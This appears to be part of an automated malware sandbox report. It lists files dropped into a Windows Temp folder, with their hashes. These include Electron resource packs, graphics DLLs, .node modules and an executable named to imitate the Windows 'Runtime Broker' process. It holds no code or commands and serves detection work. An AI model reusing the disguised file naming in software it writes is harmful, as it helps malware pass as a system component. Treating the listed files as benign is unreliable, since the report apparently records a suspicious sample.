SHA1 b9569d899a9bc34841194a18852f0572a609a01b
SHA256 7e7d0db458e1c9cfe5a4666b970f1a916652a69f1d69e70959e7971dbad2ab02
SHA512 1c8c5b21d53d009d4aa260f1206630fd99d76752fc0a49c129de0d70d335b8e7cd080cdd17b5bd5b56737017c568c100ea896c26b0c3eb21f7829beefdd8888d

C:\Users\Admin\AppData\Local\Temp\7a1b5375-1741-414f-bbdf-bc41283fd1fc.tmp.node

MD5 4dc133f62be4d0bad9378521ed482ffd
SHA1 c263c5016dd24b4729aa89932fb7b631c104cc6a
SHA256 1146ab5fd864e6aa8d2050648c340b8915582b37e2e51b44e9b8b6c7703917ff
SHA512 3f24a11bcdaee5c638617d7ec164e7e2f6dd3e2f92b348f8c0c04fdae9b06fade3b690ec38ec99d0acbd890a1ee91a7eedee65d731bbe5d7c34d046e1e1786da

C:\Users\Admin\AppData\Local\Temp\9f833f4e-553e-431e-af2e-e8d3a1e3f664.tmp.node

MD5 dc3cef5340fa0b31ca425b3c16fdde23
SHA1 9414db0d561bea01f5dcada2b1b90a9584390a80
SHA256 896ba569ed597af08f685ebab5410d77a3d3f8c5db8fcb6d2b4aba5fde59ba43
SHA512 d059169f60443253371ee441dd624592398fb54159f06c9b9e7a56d63424848e9c6c2563805730f42d15f018a172cedbeb21674719d925829073130f2e4a1def

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\chrome_100_percent.pak

MD5 acd0fa0a90b43cd1c87a55a991b4fac3
SHA1 17b84e8d24da12501105b87452f86bfa5f9b1b3c
SHA256 ccbca246b9a93fa8d4f01a01345e7537511c590e4a8efd5777b1596d10923b4b
SHA512 3e4c4f31c6c7950d5b886f6a8768077331a8f880d70b905cf7f35f74be204c63200ff4a88fa236abccc72ec0fc102c14f50dd277a30f814f35adfe5a7ae3b774

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\resources.pak

MD5 7d5065ecba284ed704040fca1c821922
SHA1 095fcc890154a52ad1998b4b1e318f99b3e5d6b8
SHA256 a10c3d236246e001cb9d434a65fc3e8aa7acddddd9608008db5c5c73dee0ba1f
SHA512 521b2266e3257adaa775014f77b0d512ff91b087c2572359d68ffe633b57a423227e3d5af8ee4494538f1d09aa45ffa1fe8e979814178512c37f7088ddd7995d

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\locales\en-US.pak

MD5 5e3813e616a101e4a169b05f40879a62
SHA1 615e4d94f69625dda81dfaec7f14e9ee320a2884
SHA256 4d207c5c202c19c4daca3fddb2ae4f747f943a8faf86a947eef580e2f2aee687
SHA512 764a271a9cfb674cce41ee7aed0ad75f640ce869efd3c865d1b2d046c9638f4e8d9863a386eba098f5dcedd20ea98bad8bca158b68eb4bdd606d683f31227594

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\chrome_200_percent.pak

MD5 4610337e3332b7e65b73a6ea738b47df
SHA1 8d824c9cf0a84ab902e8069a4de9bf6c1a9aaf3b
SHA256 c91abf556e55c29d1ea9f560bb17cc3489cb67a5d0c7a22b58485f5f2fbcf25c
SHA512 039b50284d28dcd447e0a486a099fa99914d29b543093cccda77bbefdd61f7b7f05bb84b2708ae128c5f2d0c0ab19046d08796d1b5a1cff395a0689ab25ccb51

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe

MD5 ee111f35e04d520fd9439b68e453a0c9
SHA1 7635d9f8bad6b6285ba93585020033278024bd6f
SHA256 92e95a959ab84da6930484d36a910da92e7e373c3027c33fcfea65f2b87f6652
SHA512 84b0364e13efd0534d5323e6b462e19b5c8924195d200fa2420522bbd10ff6f2968446228dde418ab629a7276b5faf6c7c87353904b66ec5557219806b126da7

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\ffmpeg.dll

MD5 1bb0e1140ef08440ad47d80b70dbf742
SHA1 c2e4243bad76b465b5ab39865ac023db1632d6b0
SHA256 c0d9edde3864d9450744f4bc526a98608b629aeed01c6647f600802e1b1cf671
SHA512 29d71e3bd7df7014a03e26ca6ee5b59ff6e3d06096742fae5dec6282abd1f0d2f24c886a503e3a691d38cc68e0da504a7f657dcec4758b640a1a523d3eeaa57a

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe

MD5 ee111f35e04d520fd9439b68e453a0c9
SHA1 7635d9f8bad6b6285ba93585020033278024bd6f
SHA256 92e95a959ab84da6930484d36a910da92e7e373c3027c33fcfea65f2b87f6652
SHA512 84b0364e13efd0534d5323e6b462e19b5c8924195d200fa2420522bbd10ff6f2968446228dde418ab629a7276b5faf6c7c87353904b66ec5557219806b126da7

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\libEGL.dll

MD5 e0a5d1a5d55dffb55513acb736cef1c1
SHA1 307fc023790af5bf3d45678de985e8e9f34896f7
SHA256 aa5da4005c76cfe5195b69282b2ad249d7dc2300bbc979592bd67315fc30c669
SHA512 094e23869fd42c60f83e0f4d1a2cd1a29d2efd805ac02a01ce9700b8e7b0e39e52fe86503264a0298c85f0d02b38620f1e773f2ea981f3049aeba3104b04253f

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\libegl.dll

MD5 e0a5d1a5d55dffb55513acb736cef1c1
SHA1 307fc023790af5bf3d45678de985e8e9f34896f7
SHA256 aa5da4005c76cfe5195b69282b2ad249d7dc2300bbc979592bd67315fc30c669
SHA512 094e23869fd42c60f83e0f4d1a2cd1a29d2efd805ac02a01ce9700b8e7b0e39e52fe86503264a0298c85f0d02b38620f1e773f2ea981f3049aeba3104b04253f

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\libGLESv2.dll

MD5 44f7c21b6010048e0dcdc43d83ebd357
SHA1 d0a4dfd8dbae1a8421c3043315d78ecd84502b16
SHA256 f6259a9b9c284ee5916447dd9d0ba051c2908c9d3662d42d8bbe6ce6d65a37de
SHA512 7e03538dd8e798d0e808a8fc6e149e83de9f8404e839900f6c9535da6aac8ef4d5c31044e547dde34dcece1255fab9a9255fa069a99fcb08e49785d812b3887c

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\libglesv2.dll

MD5 44f7c21b6010048e0dcdc43d83ebd357
SHA1 d0a4dfd8dbae1a8421c3043315d78ecd84502b16
SHA256 f6259a9b9c284ee5916447dd9d0ba051c2908c9d3662d42d8bbe6ce6d65a37de
SHA512 7e03538dd8e798d0e808a8fc6e149e83de9f8404e839900f6c9535da6aac8ef4d5c31044e547dde34dcece1255fab9a9255fa069a99fcb08e49785d812b3887c

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\d3dcompiler_47.dll

MD5 3b4647bcb9feb591c2c05d1a606ed988
SHA1 b42c59f96fb069fd49009dfd94550a7764e6c97c
SHA256 35773c397036b368c1e75d4e0d62c36d98139ebe74e42c1ff7be71c6b5a19fd7
SHA512 00cd443b36f53985212ac43b44f56c18bf70e25119bbf9c59d05e2358ff45254b957f1ec63fc70fb57b1726fd8f76ccfad8103c67454b817a4f183f9122e3f50

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\vk_swiftshader.dll

MD5 65a5705d95a0820740b3396851ff1751
SHA1 a692a80bafc41ba1b29ef19890f8465b3fb20dcb
SHA256 4c4b935cbb320033f504a89b1eb0a4bcb176bbd46a5981153cb1f54deb146a1c
SHA512 0c5df23b96eaf952c4a498ff6d854df2b62e7631b16c2855ed37ddbadffba3dd52e7450f2e06cf094bec2e0d70d14c87a652150766d90ec8662e03123df5942d

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\D3DCompiler_47.dll

MD5 3b4647bcb9feb591c2c05d1a606ed988
SHA1 b42c59f96fb069fd49009dfd94550a7764e6c97c
SHA256 35773c397036b368c1e75d4e0d62c36d98139ebe74e42c1ff7be71c6b5a19fd7
SHA512 00cd443b36f53985212ac43b44f56c18bf70e25119bbf9c59d05e2358ff45254b957f1ec63fc70fb57b1726fd8f76ccfad8103c67454b817a4f183f9122e3f50